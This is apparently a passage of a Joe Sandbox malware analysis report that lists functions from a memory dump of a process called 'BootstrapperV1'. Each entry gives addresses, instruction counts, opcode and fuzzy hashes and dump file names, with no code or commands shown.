                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2b729a907803395934623a71b5df528c73c180af9e0cf16d08376d4c41bfc192
                                                                                                                                                        • Instruction ID: 616588f0ca70c9a090140880a0e31167a2ec94181715e35b4d7ee65d45df2e70
                                                                                                                                                        • Opcode Fuzzy Hash: 2b729a907803395934623a71b5df528c73c180af9e0cf16d08376d4c41bfc192
                                                                                                                                                        • Instruction Fuzzy Hash: B531C43194DA8ECFEB85DF2888556E93BE4EF1A345F0441BBE04DD3192CA2DD849C790
                                                                                                                                                        Function 00007FFAAC5ACA31 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e2b44b1b59e098775cc675da9cb1a9f7d201c333b066bf9a5551edb9668fe3a2
                                                                                                                                                        • Instruction ID: 532c1bf70b778e1efbc367ba81981f3c0f47f954919f6f3f0e26ed51ceb434d1
                                                                                                                                                        • Opcode Fuzzy Hash: e2b44b1b59e098775cc675da9cb1a9f7d201c333b066bf9a5551edb9668fe3a2
                                                                                                                                                        • Instruction Fuzzy Hash: 4131D13190DB888FEB14EB189C4A5E9BBE4EF96710F0401AFE889D3152D665F94887C3
                                                                                                                                                        Function 00007FFAAC5AF3B5 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 5a9055866138c0e7156dfdc2c3a0d04dc04f66f89fa0dfb88620f086d3c6e333
                                                                                                                                                        • Instruction ID: 161fcf486509f9581d64f28196d2518e0324ea560ddca729321ac6c2dd991d35
                                                                                                                                                        • Opcode Fuzzy Hash: 5a9055866138c0e7156dfdc2c3a0d04dc04f66f89fa0dfb88620f086d3c6e333
                                                                                                                                                        • Instruction Fuzzy Hash: D5314B7198F6CA5FE751A7B8581A1EA7FE4DF4721070800FFE48DCB093C91D184A87A2
                                                                                                                                                        Function 00007FFAAC5A0EC1 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ee111945c3d622fdd68ae482f7dcfe184378ee5778f45cf96a432354127f239c
                                                                                                                                                        • Instruction ID: f537e77f4f59113f230ce46b004e6c1519cbf6d632586b0e1b2ee2d2d42286a4
                                                                                                                                                        • Opcode Fuzzy Hash: ee111945c3d622fdd68ae482f7dcfe184378ee5778f45cf96a432354127f239c
                                                                                                                                                        • Instruction Fuzzy Hash: 6E315F71A6E68B8FE755D77C94091B8BBE0FF9672070841FED04EC7096DE28D80A8781
                                                                                                                                                        Function 00007FFAAC5A6DE1 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 401ddcd7826189d77623ea5c3f995c22b831fb6a7005daa9251ee739043b359a
                                                                                                                                                        • Instruction ID: 587b7fb4e782ddc3c81ffb70d26e8c5fec09766a1b2296f26f6246b4ac57847a
                                                                                                                                                        • Opcode Fuzzy Hash: 401ddcd7826189d77623ea5c3f995c22b831fb6a7005daa9251ee739043b359a
                                                                                                                                                        • Instruction Fuzzy Hash: 48218E30A4CA0E8FEB88DB1D94996BD77E1FF99714F04427EE04ED3291CE25E8098785
                                                                                                                                                        Function 00007FFAAC5A11A3 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e8a06715af4597e388bb0f5a63853419d84a31ee32294e509c93639154a23821
                                                                                                                                                        • Instruction ID: 8993b1f60e09c6415877f9d24f3f909a826690aa4446f2eac058f40bc96093e0
                                                                                                                                                        • Opcode Fuzzy Hash: e8a06715af4597e388bb0f5a63853419d84a31ee32294e509c93639154a23821
                                                                                                                                                        • Instruction Fuzzy Hash: A731F571E1DA86CFFB849B6A9469AB93BE1EF5A300F0500B9F04EC32D2CD18D806C344
                                                                                                                                                        Function 00007FFAAC5A9B5F Relevance: .1, Instructions: 96COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a4f3b3b9e889b874882a56dccc9b4020615b027d0b6bc79befc29ea89581269f
                                                                                                                                                        • Instruction ID: a8f0aaad50d946926b2e32d39897ddac41231a924883a1495177c288e17e029f
                                                                                                                                                        • Opcode Fuzzy Hash: a4f3b3b9e889b874882a56dccc9b4020615b027d0b6bc79befc29ea89581269f
                                                                                                                                                        • Instruction Fuzzy Hash: 53315030959A5EDFEB94EF18C499AE877E1FF69714F0041B9E40DD72A1CA38E844CB80
                                                                                                                                                        Function 00007FFAAC59CCED Relevance: .1, Instructions: 92COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 5c68485f4a1e388971d355a98389775fda1b955e94950de5578819a00f50ceb9
                                                                                                                                                        • Instruction ID: a13156600a9a4c017028170ca97c632fe3dc1aee8e2754b8316fd35a966d9e0c
                                                                                                                                                        • Opcode Fuzzy Hash: 5c68485f4a1e388971d355a98389775fda1b955e94950de5578819a00f50ceb9
                                                                                                                                                        • Instruction Fuzzy Hash: F131C171A5DACA4FFB81E73880696A47FE1FF6A25470900F9D08DCB1A3DD1C9C468740
                                                                                                                                                        Function 00007FFAAC5A64B2 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c0cd6f1120770d9e88047f3fa7aa7f8255cc349f8f97c6fcddc90f85c5bcf8be
                                                                                                                                                        • Instruction ID: 19f83744e9d482d2e9b487fc39f8b6e992651fbc68852d0404e481748d2777bc
                                                                                                                                                        • Opcode Fuzzy Hash: c0cd6f1120770d9e88047f3fa7aa7f8255cc349f8f97c6fcddc90f85c5bcf8be
                                                                                                                                                        • Instruction Fuzzy Hash: 96215B32B4DA0A8FF798AB5CA4460F973D5EF96630B00017FE14EC3192DD1AE80B42C5
                                                                                                                                                        Function 00007FFAAC59BE1D Relevance: .1, Instructions: 89COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 11a04da7f3fc3c14a3e42be622f474879c7831d8bbbb29ecbdceb6318c2b5613
                                                                                                                                                        • Instruction ID: 0ea7e5ec29ae3cf7f7bb45b7de950940cca526ceba5b5a8e466d61c886195b15
                                                                                                                                                        • Opcode Fuzzy Hash: 11a04da7f3fc3c14a3e42be622f474879c7831d8bbbb29ecbdceb6318c2b5613
                                                                                                                                                        • Instruction Fuzzy Hash: 1811D621A4EB4B4FF798DB5C9855A717BD9EF96211B0486FAE00CC7193DE1ED8068390
                                                                                                                                                        Function 00007FFAAC591289 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 82cafe1c02258f0f39083bc5ca090b348617998fe6772beceeb31081097cd541
                                                                                                                                                        • Instruction ID: 829ff0f6008a05bd7f538951d6c2545eebe4e0b13382f763d256659cc54b2a81
                                                                                                                                                        • Opcode Fuzzy Hash: 82cafe1c02258f0f39083bc5ca090b348617998fe6772beceeb31081097cd541
                                                                                                                                                        • Instruction Fuzzy Hash: C321C491A5F7D64FE362A77808254A6BFF09F5725074E84FBD088CB0A7E94D9C0D8352
                                                                                                                                                        Function 00007FFAAC5A19EE Relevance: .1, Instructions: 86COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 89955ebc511d68c2aed77571c3d2fab2a84fa82596ab1d7be192b430db18545c
                                                                                                                                                        • Instruction ID: 42cca133c4a98c3964e2d4093563a98681d7c013a747178f2b5812c1ed08a40d
                                                                                                                                                        • Opcode Fuzzy Hash: 89955ebc511d68c2aed77571c3d2fab2a84fa82596ab1d7be192b430db18545c
                                                                                                                                                        • Instruction Fuzzy Hash: 30219242A4F7C64FE397937C48692613FD5DF9B52070942FBD088CB1A3C8098C0A8391
                                                                                                                                                        Function 00007FFAAC59092D Relevance: .1, Instructions: 84COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7f9f6811a1911951692009a830456ae1a0775f287d5647ff9ea5878981cd8a13
                                                                                                                                                        • Instruction ID: b9d79e42f7f2008b7a59b48180744b868831f0c6754f72fc2d05a519efb8e052
                                                                                                                                                        • Opcode Fuzzy Hash: 7f9f6811a1911951692009a830456ae1a0775f287d5647ff9ea5878981cd8a13
                                                                                                                                                        • Instruction Fuzzy Hash: 8A214670A9F7C74FE342ABF444161EABBD09F47360B4444E9D08ACB292CA1D1C4A8751
                                                                                                                                                        Function 00007FFAAC5A94FA Relevance: .1, Instructions: 83COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6f5fd0541c459a628479a377ca6e40f0858ee1b8a423b35a290fa367a9e7124f
                                                                                                                                                        • Instruction ID: ce9fa956c1f3096998b913c5c2e403a45efe57c0be7a249156c60e819cbc2f1f
                                                                                                                                                        • Opcode Fuzzy Hash: 6f5fd0541c459a628479a377ca6e40f0858ee1b8a423b35a290fa367a9e7124f
                                                                                                                                                        • Instruction Fuzzy Hash: 18210862D9D6968FE301F37CA89A0F97F90EF47724B1481BBD04DCA0A3EC19544943D2
                                                                                                                                                        Function 00007FFAAC5AEE27 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6c354d657e9fe3ebeebc1fbba762b07ead46e75e6766dea3fa5c47589f5c2211
                                                                                                                                                        • Instruction ID: a0faa087a17c4ad15ac213263e50c0f06e30113686f3a99e8c039a23541f3e98
                                                                                                                                                        • Opcode Fuzzy Hash: 6c354d657e9fe3ebeebc1fbba762b07ead46e75e6766dea3fa5c47589f5c2211
                                                                                                                                                        • Instruction Fuzzy Hash: D7213630B5D68B8FE741AFB9C4166EABBD1DF563A0F0405BED04EC7192CE1C88498781
                                                                                                                                                        Function 00007FFAAC59DEE1 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 937be3ccc3e393e27c139b54c3778c0d75be724de512599232b9aa69b60f6a6d
                                                                                                                                                        • Instruction ID: 489f919b1552b7ab9154114abe382a9ecd1013b9a04e261e1b69d3a8be8967ba
                                                                                                                                                        • Opcode Fuzzy Hash: 937be3ccc3e393e27c139b54c3778c0d75be724de512599232b9aa69b60f6a6d
                                                                                                                                                        • Instruction Fuzzy Hash: E4110462B1EE8A8FF695826C1C571742EC4DF9A30070941FBE40ECB2E2DA4ACC098385
                                                                                                                                                        Function 00007FFAAC5AEF99 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 83f2ae930cf80c77905c2b46e6342da2c348578413ef3e333255bc20d43e86cd
                                                                                                                                                        • Instruction ID: a541be2e83ebaf88f235c4918025d0fda22a0d9e24c58791a5b736f24f137494
                                                                                                                                                        • Opcode Fuzzy Hash: 83f2ae930cf80c77905c2b46e6342da2c348578413ef3e333255bc20d43e86cd
                                                                                                                                                        • Instruction Fuzzy Hash: 6A11E97295DA8D8FFB90EBA998055B97BE4FB8A310F0402AAF01DC31D2DB549C0987C1
                                                                                                                                                        Function 00007FFAAC59DF00 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9c2748c4727a233895167f76be74cd851905e62fad4ec553a4d438117b180ce0
                                                                                                                                                        • Instruction ID: 2626e29f6d470722095bbc96110f3828f18f00535c4b471403c6f5f7aa9092ed
                                                                                                                                                        • Opcode Fuzzy Hash: 9c2748c4727a233895167f76be74cd851905e62fad4ec553a4d438117b180ce0
                                                                                                                                                        • Instruction Fuzzy Hash: 37112522B1ED5A4BFAD4819D2C571752EC4DB9A31070441FBF50EC72A5DD4BCC4982C5
                                                                                                                                                        Function 00007FFAAC59BF7D Relevance: .1, Instructions: 77COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 37fc3a1773a94b5b3cb0b4982670f285bd73a8d541352e57a4754e1ef2326aaa
                                                                                                                                                        • Instruction ID: ea3794c58c2427b792419df23cfb171263215d61a244c0601d4cb32103c83267
                                                                                                                                                        • Opcode Fuzzy Hash: 37fc3a1773a94b5b3cb0b4982670f285bd73a8d541352e57a4754e1ef2326aaa
                                                                                                                                                        • Instruction Fuzzy Hash: 3511266154EBC65FF362A37898565B13FD8EF5725070A00FBE08CC71A3D80D9C8A83A1
                                                                                                                                                        Function 00007FFAAC5AEFD1 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0fe8100da750e174c7d265c49b157eae52def5e58fc0c01b913aa2f818ef0278
                                                                                                                                                        • Instruction ID: 0c509a7bbaf8ffe88235ca0b34d299ee8843a6af5249b4c4904f2868dd1eea66
                                                                                                                                                        • Opcode Fuzzy Hash: 0fe8100da750e174c7d265c49b157eae52def5e58fc0c01b913aa2f818ef0278
                                                                                                                                                        • Instruction Fuzzy Hash: 0911297189EA895FF740D7695C055FA3BE8EB8A320B0442A7F01DC35D2CA5C994683D1
                                                                                                                                                        Function 00007FFAAC59118C Relevance: .1, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7a5045b31f7820f6f63acca5b248a0348ea624d1397ff65bf85d1d9a3740bcc0
                                                                                                                                                        • Instruction ID: f71d541d89d724ddb79f866ba871bf69aadb674a73a8af3fd97b2e42fc086047
                                                                                                                                                        • Opcode Fuzzy Hash: 7a5045b31f7820f6f63acca5b248a0348ea624d1397ff65bf85d1d9a3740bcc0
                                                                                                                                                        • Instruction Fuzzy Hash: 391103709AE3C69FE705ABB484555D97FE0EF172A0F0804ADD4CACB192D62D484ACB23
                                                                                                                                                        Function 00007FFAAC5AF1E0 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 956251d5dbb40003b7014046a38c52192d0ed39fc7b1cd69234c3ad35abcfc95
                                                                                                                                                        • Instruction ID: 3934ddd935a9ba2bc588ac30ccc2ac4f1288a1045eec44644ea9994299eb9bcb
                                                                                                                                                        • Opcode Fuzzy Hash: 956251d5dbb40003b7014046a38c52192d0ed39fc7b1cd69234c3ad35abcfc95
                                                                                                                                                        • Instruction Fuzzy Hash: 1911C230ABF2CB4FE746AAF558155E976C19F07270B8405B8C04AC74E2ED5E888E8216
                                                                                                                                                        Function 00007FFAAC590480 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8091fd4aabb7060882dbb32d6b77d2e8f3fce32a6c4039018fb55fcf0541ea06
                                                                                                                                                        • Instruction ID: ff2c6584a93e5db3a108d7e260e8fac75bc78107d9916eb616dd170dd6285b00
                                                                                                                                                        • Opcode Fuzzy Hash: 8091fd4aabb7060882dbb32d6b77d2e8f3fce32a6c4039018fb55fcf0541ea06
                                                                                                                                                        • Instruction Fuzzy Hash: D101D817A8D0664BE610737CF8B59F93B40CF4A339B19C2B3E18DC91A3DC09684952D5
                                                                                                                                                        Function 00007FFAAC594ED0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: cc9404e5c68566c0705a6ef9e5e2b75e24c26113f8b04d69b857a3dcc5d720d8
                                                                                                                                                        • Instruction ID: e12290a6f2ed2c72c3b7ba9b163889f629633ca5127ad3697281052c997b80a8
                                                                                                                                                        • Opcode Fuzzy Hash: cc9404e5c68566c0705a6ef9e5e2b75e24c26113f8b04d69b857a3dcc5d720d8
                                                                                                                                                        • Instruction Fuzzy Hash: D601A221B4990E9FEAA4D72CA40577633C9EB9A314F8002BAF50DC3656DD2ADC0543C1
                                                                                                                                                        Function 00007FFAAC5AF0F2 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: eae8c206ec13f81eff7b86f635b62d5fb6c360178635273fb28eb748a81fa99b
                                                                                                                                                        • Instruction ID: d2fb4974ca0660c1758f321ce858b40f190e15e48feddc9b42c11e2a86e8f4ae
                                                                                                                                                        • Opcode Fuzzy Hash: eae8c206ec13f81eff7b86f635b62d5fb6c360178635273fb28eb748a81fa99b
                                                                                                                                                        • Instruction Fuzzy Hash: E911C160A6FAC39FF381B3F484169BA7AD16F47290B4848F8D04EC71E3DD1D58498312
                                                                                                                                                        Function 00007FFAAC5A02D1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c55944a19ba69fd545f40b34e71a52f79fd4af148003a52622f2dfae54c769ed
                                                                                                                                                        • Instruction ID: 88f3a78eb98d0856dbd25a5b691bc1b56b5a2a19c387c0c41317eca5e1eb3b4d
                                                                                                                                                        • Opcode Fuzzy Hash: c55944a19ba69fd545f40b34e71a52f79fd4af148003a52622f2dfae54c769ed
                                                                                                                                                        • Instruction Fuzzy Hash: EBF0BB2271D5480FE394951DAC5D5713FD4DF6613130501FFE84DC7163E94698468394
                                                                                                                                                        Function 00007FFAAC599D2B Relevance: .1, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 359088f63e61f07a318b290158688763f0e5af58f4339e50118a780543f920d0
                                                                                                                                                        • Instruction ID: 19e88be7657caf27743049d85a1612e4de3884cdfd15784f22e00653f7224cbb
